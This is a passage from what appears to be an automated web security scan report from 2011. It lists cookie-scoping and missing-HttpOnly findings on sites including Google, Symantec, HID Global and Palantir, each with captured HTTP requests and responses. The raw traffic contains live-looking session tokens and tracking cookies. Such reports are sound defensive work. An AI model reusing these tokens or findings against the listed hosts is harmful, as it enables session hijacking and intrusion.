Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=1948&BWDate=40587.401238&debuglevel=&FLV=10.2154&RES=128&WMPV=0; A3=gSboahoy0aSU00002gSdsafy50aSU00003gPVtafzY0bnA00001gDQzahdw07ZZ00001fFb9afAF02WG00001h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeahAp0c9M00003gYx+adw90cvM00001gKXNaepP0bdR00001afPqahnP09NH00001heXfagzX0c9M00001heXgahod0c9M00003h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001gK8raeXe0aA900001heXhahnM0c9M00004heXiagzX0c9M00004gSdmafy60aSU00002gSdnafwN0aSU00003heXjahoy0c9M00002hbwIaeVY09SF00002heXaaf9P0c9M00001gSdpafvK0aSU00001hAp8ahzF06OS00001heXbahoZ0c9M00001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; B3=5p9W0000000001td8bvZ0000000001t68qiu0000000002t689PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t58fq70000000001t88qav000000000atd7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t68oiy0000000001te7FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fpT0000000002td8fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000007te8i430000000001t2852A0000000001sS8qay0000000002td87H10000000001td8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=1948&BWDate=40587.401238&debuglevel=&FLV=10.2154&RES=128&WMPV=0; expires=Sun, 15-May-2011 13:57:17 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gPVtafzY0bnA00001gSdsafy50aSU00003gSboahoy0aSU00002gLnTaeKR09sO00001h5j3afvK07l00000.h5iUafy507l00000SfFb9afAF02WG00001gDQzahdw07ZZ00001gYyfadw90cvM00001gDa8aeXd0aA900001gYRSaeKR09sO00001gL2MadKj0bdR00001hghLaeVW09SF00002g7VJafdh08.I00001h802ae7k0c6L00001gKXMaepH0bdR00001gFjwaeKR09sO00001gKXNaepP0bdR00001gYx+adw90cvM00001heXeahAp0c9M00003heXfagzX0c9M00001afPqahnP09NH00001gHrHaeKS09sO00001gSdkafvD0aSU00001h6moagvf0aMN00002heXgahod0c9M00003heXhahnM0c9M00004gK8raeXe0aA900001gSdmafy60aSU00002heXiagzX0c9M00004heXjahoy0c9M00002gSdnafwN0aSU00003hbwIaeVY09SF00002hAp8ahzF06OS00001gSdpafvK0aSU00001heXaaf9P0c9M00001hbxBahE507aw00001heXbahoZ0c9M00001g+nBaeUD02Hn00001gNQ4ae7r0c9M00001; expires=Sun, 15-May-2011 13:57:17 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000St88qiu0000000002t68bvZ0000000001t65p9W0000000001td89PT000000000.t87oaf0000000001t884fB0000000001t88fq40000000001t88fq50000000003t88bwx0000000001t48i440000000001t28mb20000000001t480Te0000000001te82790000000002t57PrH0000000001t78fq70000000001t886Bm0000000001t67dNH0000000002sZ8qav000000000atd8oiy0000000001te8j4q0000000001t67GHq0000000001s.84ZE0000000001t684ZF0000000002t67FCH0000000001s.8cVQ0000000001sV8nAl0000000002t682980000000001t384U10000000001t6852N0000000001s.8fq20000000003t88fpT0000000002td8fq30000000002t86o.Q0000000001sY87ma0000000001s.8i430000000001t28qaw0000000007te8qay0000000002td8n7e0000000002tb87H10000000001td; expires=Sun, 15-May-2011 13:57:17 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sun, 15-May-2011 13:57:17 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 14 Feb 2011 18:57:17 GMT
Connection: close
Content-Length: 1872

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

10.5. http://id.google.com/verify/EAAAAECooqCHV7UqXTtcjqtOtZg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAECooqCHV7UqXTtcjqtOtZg.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAECooqCHV7UqXTtcjqtOtZg.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Hunton+%26+Williams
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=vh2P4wbWfsr7YP0pDfdGGpK2NYXpyWyYb9yAjSBN=VVwnPEM5v0U6HxoS; NID=43=obiPR5hLYFuxjHFaBKfW93ixnZDQ-VMz_DH1OlhaN-yePLjFDeS8n93BL0uLr8ZZRP1Q-oGTfRDUq959OW02bwIfnCKUYL1o77VaRxDLU1bMGiX_J_d5VFYuaFXTSXGL; PREF=ID=11a9f75446a95c33:U=af2eb0fc870398cf:FF=0:TM=1293845297:LM=1297558495:GM=1:S=6ZwDDuC1wBKi7F_t

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=44=tFMgpb8t0zHtSLWiTOheRqm3vZ0iuj2nkAl9KoYTrw=El3zFaChbR5uZe4H; expires=Tue, 16-Aug-2011 18:56:14 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 14 Feb 2011 18:56:14 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.6. http://metrics.hidglobal.com/b/ss/hidprod/1/H.19.4/s85479820847976  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.hidglobal.com
Path:   /b/ss/hidprod/1/H.19.4/s85479820847976

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/hidprod/1/H.19.4/s85479820847976?AQB=1&ndh=1&t=14/1/2011%2012%3A29%3A55%201%20360&vmt=4A560CED&ns=hidglobal&pageName=hid%20global%20%3A%20landing%20page%20%3A%20customer%20support&g=http%3A//www.hidglobal.com/page.php%3Fpage_id%3D223&r=http%3A//www.hidglobal.com/&cc=USD&ch=hid%20global&c1=hid%20global%20%3A%20landing%20page&c2=hid%20global%20%3A%20landing%20page%20%3A%20customer%20support&v3=hid%20global%20%3A%20landing%20page%20%3A%20customer%20support&v8=en_US&c12=en_US&c17=hid%20global%20%3A%20landing%20page%20%3A%20customer%20support&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1113&bh=1010&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.hidglobal.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/page.php?page_id=223
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.2.10.1297708154; s_cc=true

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 18:29:42 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26ACBA4B051D14D4-4000010380005785[CE]; Expires=Sat, 13 Feb 2016 18:29:42 GMT; Domain=.hidglobal.com; Path=/
Location: http://metrics.hidglobal.com/b/ss/hidprod/1/H.19.4/s85479820847976?AQB=1&pccr=true&vidn=26ACBA4B051D14D4-4000010380005785&&ndh=1&t=14/1/2011%2012%3A29%3A55%201%20360&vmt=4A560CED&ns=hidglobal&pageName=hid%20global%20%3A%20landing%20page%20%3A%20customer%20support&g=http%3A//www.hidglobal.com/page.php%3Fpage_id%3D223&r=http%3A//www.hidglobal.com/&cc=USD&ch=hid%20global&c1=hid%20global%20%3A%20landing%20page&c2=hid%20global%20%3A%20landing%20page%20%3A%20customer%20support&v3=hid%20global%20%3A%20landing%20page%20%3A%20customer%20support&v8=en_US&c12=en_US&c17=hid%20global%20%3A%20landing%20page%20%3A%20customer%20support&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1113&bh=1010&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sun, 13 Feb 2011 18:29:42 GMT
Last-Modified: Tue, 15 Feb 2011 18:29:42 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www28
Content-Length: 0
Content-Type: text/plain


10.7. http://om.symantec.com/b/ss/veritasnonconsumer,veritasconnect/1/H.22.1/s81967138894833  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://om.symantec.com
Path:   /b/ss/veritasnonconsumer,veritasconnect/1/H.22.1/s81967138894833

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/veritasnonconsumer,veritasconnect/1/H.22.1/s81967138894833?AQB=1&ndh=1&t=14%2F1%2F2011%2013%3A3%3A41%201%20360&ce=UTF-8&pageName=en%2Fus%3A%20biz%3A%20connect%3A%20security%3A%20blogs%3A%20updated%20w32.stuxnet%20dossier%20is%20available&g=http%3A%2F%2Fwww.symantec.com%2Fconnect%2Fblogs%2Fupdated-w32stuxnet-dossier-available&cc=USD&ch=Business%3A%20Connect&server=symantec&events=event69&c2=us&c3=en&c7=1017241&v7=1017241&c18=connect_utility%3A%20blogs&v18=en%2Fus%3A%20biz%3A%20connect%3A%20security%3A%20blogs%3A%20updated%20w32.stuxnet%20dossier%20is%20available&c27=Business&v27=us&v28=en&v29=Business%3A%20Connect&c30=0&v32=0&c33=http%3A%2F%2Fwww.symantec.com%2Fconnect%2Fblogs%2Fupdated-w32stuxnet-dossier-available&v33=connect_utility%3A%20blogs&c35=en%2Fus%3A%20biz%3A%20connect%3A%20security%3A%20blogs%3A%20updated%20w32.stuxnet%20dossier%20is%20available&c41=Connect&v41=Connect&c42=Endpoint%20Protection%20(AntiVirus)&v42=Endpoint%20Protection%20(AntiVirus)&c46=html&c47=page&c48=Updated%20W32.Stuxnet%20Dossier%20is%20Available&v48=Security&c49=Security&v49=Updated%20W32.Stuxnet%20Dossier%20is%20Available&v50=Business&c54=Connect&v54=Connect&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1113&bh=1010&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: om.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_sess=%20s_cc%3Dtrue%3B; s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 19:03:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26ACBE3E85011833-40000100C034034F[CE]; Expires=Sat, 13 Feb 2016 19:03:25 GMT; Domain=.symantec.com; Path=/
Location: http://om.symantec.com/b/ss/veritasnonconsumer,veritasconnect/1/H.22.1/s81967138894833?AQB=1&pccr=true&vidn=26ACBE3E85011833-40000100C034034F&&ndh=1&t=14%2F1%2F2011%2013%3A3%3A41%201%20360&ce=UTF-8&pageName=en%2Fus%3A%20biz%3A%20connect%3A%20security%3A%20blogs%3A%20updated%20w32.stuxnet%20dossier%20is%20available&g=http%3A%2F%2Fwww.symantec.com%2Fconnect%2Fblogs%2Fupdated-w32stuxnet-dossier-available&cc=USD&ch=Business%3A%20Connect&server=symantec&events=event69&c2=us&c3=en&c7=1017241&v7=1017241&c18=connect_utility%3A%20blogs&v18=en%2Fus%3A%20biz%3A%20connect%3A%20security%3A%20blogs%3A%20updated%20w32.stuxnet%20dossier%20is%20available&c27=Business&v27=us&v28=en&v29=Business%3A%20Connect&c30=0&v32=0&c33=http%3A%2F%2Fwww.symantec.com%2Fconnect%2Fblogs%2Fupdated-w32stuxnet-dossier-available&v33=connect_utility%3A%20blogs&c35=en%2Fus%3A%20biz%3A%20connect%3A%20security%3A%20blogs%3A%20updated%20w32.stuxnet%20dossier%20is%20available&c41=Connect&v41=Connect&c42=Endpoint%20Protection%20(AntiVirus)&v42=Endpoint%20Protection%20(AntiVirus)&c46=html&c47=page&c48=Updated%20W32.Stuxnet%20Dossier%20is%20Available&v48=Security&c49=Security&v49=Updated%20W32.Stuxnet%20Dossier%20is%20Available&v50=Business&c54=Connect&v54=Connect&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1113&bh=1010&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sun, 13 Feb 2011 19:03:25 GMT
Last-Modified: Tue, 15 Feb 2011 19:03:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www6
Content-Length: 0
Content-Type: text/plain


11. Cookie without HttpOnly flag set  previous  next
There are 31 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



11.1. https://support.palantir.com/pg/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.palantir.com
Path:   /pg/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pg/ HTTP/1.1
Host: support.palantir.com
Connection: keep-alive
Referer: https://support.palantir.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 14 Feb 2011 18:50:40 GMT
Server: Apache-Coyote/1.1
Location: https://support.palantir.com/pg/home.do
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Set-Cookie: JSESSIONID=F3A71652B86046597A441E158CEE25D6; Path=/; Secure


11.2. https://symaccount.symantec.com/SymAccount/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://symaccount.symantec.com
Path:   /SymAccount/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SymAccount/index.jsp?returnURL=https%3A%2F%2Fwww-secure.symantec.com%2Fconnect%2Fsymantec_symaccount HTTP/1.1
Host: symaccount.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/connect/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.4.10.1297710221; s_pers=%20s_nr%3D1297710257466-New%7C1318446257466%3B%20event69%3Devent69%7C1318446257467%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasconnect%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520connect%2525253A%25252520allconnct%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%2525252Fuser%2525252Fregister%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 19:04:03 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001jNJOoXbS6XFi_8-L5Hb1piK:3LT5QVUHCV; Path=/
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 7972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...

11.3. http://www.b2i.us/irpass.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.b2i.us
Path:   /irpass.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /irpass.asp?BzID=1475&to=cp&Nav=0&S=0&L=1&ID=5606 HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.mygovernancewebsite.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Mon, 14 Feb 2011 18:42:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
pragma: no-cache
cache-control: private
Location: http://www.b2i.us/profiles/investor/fullpage.asp?f=1&BzID=1475&to=cp&Nav=0&LangID=1&s=0&ID=5606
Content-Length: 240
Content-Type: text/html
Expires: Mon, 14 Feb 2011 18:41:11 GMT
Set-Cookie: cSite1475=0; expires=Tue, 15-Feb-2011 18:42:10 GMT; path=/
Set-Cookie: cNav1475=0; expires=Sat, 19-Feb-2011 18:42:10 GMT; path=/
Set-Cookie: cLang1475=1; expires=Sat, 19-Feb-2011 18:42:10 GMT; path=/
Set-Cookie: ASPSESSIONIDSARSASDC=NDPBGGGAGGEPDGFPBAIFJHNI; path=/
Cache-control: no-cache
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.b2i.us/profiles/investor/fullpage.asp?f=1&amp;BzID=1475&amp;to=cp&amp;Nav=0&amp;LangID=
...[SNIP]...

11.4. http://www.bericotechnologies.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bericotechnologies.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.bericotechnologies.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:51:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS3c4036a5947dcf60c7c1c31f914be361=2e1dc5d355c13a8280f8252302154c74; expires=Wed, 09-Mar-2011 22:25:02 GMT; path=/; domain=.bericotechnologies.com
Last-Modified: Mon, 14 Feb 2011 18:51:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 24903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

11.5. http://www.businesswire.com/portal/site/home/membership/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.businesswire.com
Path:   /portal/site/home/membership/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/site/home/membership/ HTTP/1.1
Host: www.businesswire.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CLEQ_a=9574e5bacd98427a978b51a0390d0000.2; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:42:17 GMT
Server: Apache
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=XBgFNZ3JVQHpqp0FvWjlQHf1pWDnC9L1gHmln8C1pnLn98mkn8dR!-1779741921!-2131909068; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Length: 25057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Membership Ben
...[SNIP]...

11.6. http://www.hidglobal.com/lightbox_page.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hidglobal.com
Path:   /lightbox_page.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lightbox_page.php?page_id=297&height=500&width=500&random=1297709234191 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
Cache-Control: no-cache
Host: www.hidglobal.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:51:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=s464kq0dm1keovd7dnl3q5kgq6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2663
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv='Content-T
...[SNIP]...

11.7. http://www.hidglobal.com/page.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hidglobal.com
Path:   /page.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /page.php?page_id=223 HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.1.10.1297708154; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=tsr2bhqkbe82vdltq8p1hv3r43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...

11.8. http://www.hidglobal.com/pressrelease.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hidglobal.com
Path:   /pressrelease.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

